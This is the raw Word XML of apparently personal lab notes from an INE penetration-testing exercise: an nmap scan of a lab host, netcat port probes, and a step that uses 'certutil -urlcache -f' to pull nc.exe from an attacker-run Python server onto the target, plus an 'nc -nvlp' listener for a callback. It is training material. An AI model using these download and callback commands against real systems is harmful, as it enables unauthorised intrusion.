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924AB" w14:textId="16D550E6" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:t xml:space="preserve">Starting scenario: the target system has a domain running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17911763" w14:textId="394EE4DC" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:t xml:space="preserve">By pinging it, we find the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is 10.4.19.151</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001FCF42" w14:textId="5F5ED7DD" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:t xml:space="preserve">We can do an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan on this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE5AD44" w14:textId="7443073A" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06E7B5EE" wp14:editId="27094F1D">
            <wp:extent cx="5939155" cy="2987040"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3810"/>
            <wp:docPr id="92742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2987040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="261E4262" w14:textId="0A7DB3EB" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:t xml:space="preserve">Let’s try to connect with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D365F9" w14:textId="2C942F77" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64DAE502" wp14:editId="32F7DED1">
            <wp:extent cx="4798695" cy="3178810"/>
            <wp:effectExtent l="0" t="0" r="1905" b="2540"/>
            <wp:docPr id="839085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3178810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3686A036" w14:textId="0C270769" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:t xml:space="preserve">Hmm, we can see some of the ports are open. Port 22 shows connection refused. Note, port 20 did not show up on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan as being open. This is correct, port 22 is not open, I’m just showing you the output to let you know what to expect to see if the service is, indeed, closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D0202A" w14:textId="0C354C3A" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This contrasts the closed port 22 from the open ports 80 and 445.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D5E727" w14:textId="77777777" w:rsidR="00B65764" w:rsidRDefault="00B65764"/>
    <w:p w14:paraId="3B30BFE6" w14:textId="663AB17F" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:t xml:space="preserve">Now let’s look at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to see some output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C16BA26" w14:textId="7C7CC619" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:t xml:space="preserve">Assume we have a python server running where nc.exe is stored on our attack machine. This will let </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>certutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> download it on the target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744D4C8B" w14:textId="3A55564F" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:t xml:space="preserve">Assume we have navigated to binaries or wherever </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1348065D" w14:textId="603582DA" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:t xml:space="preserve">One terminal should run python </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>simpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48468BEE" w14:textId="428F52E0" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:t xml:space="preserve">Another terminal should start a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener with command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183AE182" w14:textId="1E7BA5D9" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:t xml:space="preserve">Command : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>certutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlcache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -f </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00EE160E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://ip.address</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> file.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CF70BD" w14:textId="18068389" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:t xml:space="preserve">Downloads </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8345C0" w14:textId="3344F419" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37FD4F2B" wp14:editId="0136ED94">
            <wp:extent cx="5939155" cy="3091815"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="65266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091815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E14C8AE" w14:textId="49950DBC" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:t>With command:`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipaddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> port# ` we try to connect via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, but get refused.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153DDF37" w14:textId="15A5660E" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:t>This is okay, we’re only trying to generate traffic to look at what it shows up as on our attack machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C00F4EB" w14:textId="1D95E267" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16AE13FC" wp14:editId="7E4AFB41">
            <wp:extent cx="5939155" cy="3048000"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="668811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048000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B70EE06" w14:textId="4384B83E" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:t xml:space="preserve">Listening on the attack machine, we see the connection coming from 10.4.22.150, which is the victim machine we used above to try and connect back. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CB5F14" w14:textId="5ED5C28A" w:rsidR="00B65764" w:rsidRDefault="00B65764">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="360EC3B3" wp14:editId="6810929F">
            <wp:extent cx="5129530" cy="1071245"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1316136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30" cy="1071245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B6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64"/>
    <w:rsid w:val="00364A44"/>
    <w:rsid w:val="00B6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7228"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9DEEA00D-E6FD-4EBA-BCBC-C749DCF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764"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B6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p.addres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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-20T01:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-20T02:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>